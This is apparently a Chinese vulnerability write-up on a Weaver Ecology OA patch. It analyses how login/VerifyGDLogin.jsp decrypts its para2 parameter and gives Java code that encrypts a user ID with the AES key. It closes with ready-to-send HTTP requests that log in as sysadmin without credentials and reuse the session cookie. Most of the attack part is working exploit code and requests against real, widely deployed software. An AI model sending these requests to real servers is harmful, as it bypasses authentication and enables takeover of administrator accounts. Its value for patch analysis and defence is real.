0x01 前言

在跟踪泛微补丁包时发现Ecology_security_20230725_v9.0_v10.58.3SecurityRuleGdLogin0317的补丁疑似修复了一个SQL注入,因此跟踪下看看

image-20231122152333920

上图为补丁关键操作,看内容像是进行了SQL注入检测,后续分析发现是一处任意用户登录

0x02 分析

跟踪关键文件login/VerifyGDLogin.jsp

image-20231122152542202

看源码为从URI中获取parapara1para2后调用PoppupRemindInfoUtil.decryptpara2做解密,然后通过weaver.login.VerifyGDLogin#getUserCheck方法进行登录校验

image-20231122152724573

其中PoppupRemindInfoUtil.decrypt方法首先会校验WEB-INF/prop/AESpassword.properties中的pwd项是否为空,不为空则赋值给var1,为空则给var1赋值1

image-20231122152924062

然后使用SM4IntegrationUtil.USE_SM4方法判断是否启用了国密SM4加密算法,如启用则使用SM4解密,否则调用AES.decrypt进行解密,默认为false

image-20231122153107029

小插曲

  • 泛微在2022-07-26(v10.49版本)修复了笔者的一个任意用户登录漏洞,10.49补丁顺带初始化了WEB-INF/prop/AESpassword.properties文件,修复前该文件的pwd为字符串NULL,修复后为随机字符,因此利用该漏洞需要配合一处任意文件读取

image-20231122153946663

其中AES.decrypt方法如下

image-20231122153426123

那么加密函数就为AES.encrypt,代码如下

public static String encryptAES_SunJCE(String var0, String var1) {
       byte[] var2 = null;
       try {
           KeyGenerator var3 = KeyGenerator.getInstance("AES");
           SecureRandom var4 = SecureRandom.getInstance("SHA1PRNG");
           var4.setSeed(var1.getBytes());
           var3.init(128, var4);
           SecretKey var5 = var3.generateKey();
           byte[] var6 = var5.getEncoded();
           SecretKeySpec var7 = new SecretKeySpec(var6, "AES");
           Cipher var8 = Cipher.getInstance("AES", "SunJCE");
           byte[] var9 = var0.getBytes();
           var8.init(1, var7);
           var2 = var8.doFinal(var9);
       } catch(NoSuchProviderException var10) {
           var10.printStackTrace();
       } catch(NoSuchAlgorithmException var11) {
           var11.printStackTrace();
       } catch(NoSuchPaddingException var12) {
           var12.printStackTrace();
       } catch(InvalidKeyException var13) {
           var13.printStackTrace();
       } catch(IllegalBlockSizeException var14) {
           var14.printStackTrace();
       } catch(BadPaddingException var15) {
           var15.printStackTrace();
       }
       return var2 == null ? "" : Tools.parseByte2HexStr(var2);
   }

生成加密数据的代码

package test;
import com.pluginweaver.utils.CryptTool;

public class testAesCrypt {
    public static void main(String[] args) {
        //4DUa6Wq9
        //1
        String cryptStr="1";
        String enStr=CryptTool.encryptAES_SunJCE( cryptStr,"4DUa6Wq9");
        System.out.println(enStr);
    }
}

image-20231122153629277

0x03 Exploit

按照前文分析构造好数据包后发送

POST /login/VerifyGDLogin.jsp HTTP/1.1
Host: 192.168.232.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

para=ViewRequest.jsp&para1=123&para2=E4D160ED60A81E804F24EE2AE592D66F

image-20231122153721657

复制返回的ecology_JSessionid访问需要鉴权的接口即可以sysadmin登录

GET /api/hrm/login/getAccountList?__random__=1700633695101 HTTP/1.1
Host: 192.168.232.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Referer: http://192.168.232.129/wui/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaaOhmJeYzN2NbvHFv1Vy;
Connection: close


image-20231122153824074